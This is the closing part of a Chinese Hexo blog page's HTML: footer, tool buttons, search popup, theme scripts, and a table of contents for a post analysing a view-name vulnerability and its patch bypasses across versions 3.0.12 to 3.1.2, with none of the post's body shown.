    &copy;&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">1diot9</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    
        
        <div class="deploy-info info-item">
            
            本站由 <span class="tooltip" data-tooltip-content="GitHub Pages"><img src="/images/brands/github.png"></span> 提供部署服务
            
        </div>
    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">102.2k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="nav-number">1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E7%94%A8%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">基本用法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">4.</span> <span class="nav-text">漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#processDispatchResult%E6%BC%8F%E6%B4%9E%E8%A7%A6%E5%8F%91"><span class="nav-number">4.1.</span> <span class="nav-text">processDispatchResult漏洞触发</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%94%AF1"><span class="nav-number">4.1.1.</span> <span class="nav-text">分支1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%94%AF2"><span class="nav-number">4.1.2.</span> <span class="nav-text">分支2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#applyDefaultViewName%E6%BC%8F%E6%B4%9E%E8%A7%A6%E5%8F%91"><span class="nav-number">4.2.</span> <span class="nav-text">applyDefaultViewName漏洞触发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ha-handle"><span class="nav-number">4.3.</span> <span class="nav-text">ha.handle</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E6%B3%95%E5%88%A9%E7%94%A8%E7%9A%84%E6%83%85%E5%86%B5"><span class="nav-number">4.4.</span> <span class="nav-text">无法利用的情况</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9E%E6%98%BE%E9%97%AE%E9%A2%98"><span class="nav-number">5.</span> <span class="nav-text">回显问题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A5%E4%B8%81%E7%BB%95%E8%BF%87"><span class="nav-number">6.</span> <span class="nav-text">补丁绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-12"><span class="nav-number">6.1.</span> <span class="nav-text">3.0.12</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-13"><span class="nav-number">6.2.</span> <span class="nav-text">3.0.13</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-0-14"><span class="nav-number">6.3.</span> <span class="nav-text">3.0.14</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-2"><span class="nav-number">6.4.</span> <span class="nav-text">3.1.2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">7.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">8.</span> <span class="nav-text">参考</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="pjax">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        
            
<script src="/js/post/copyright-info.js"></script>

        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




</body>
</html>
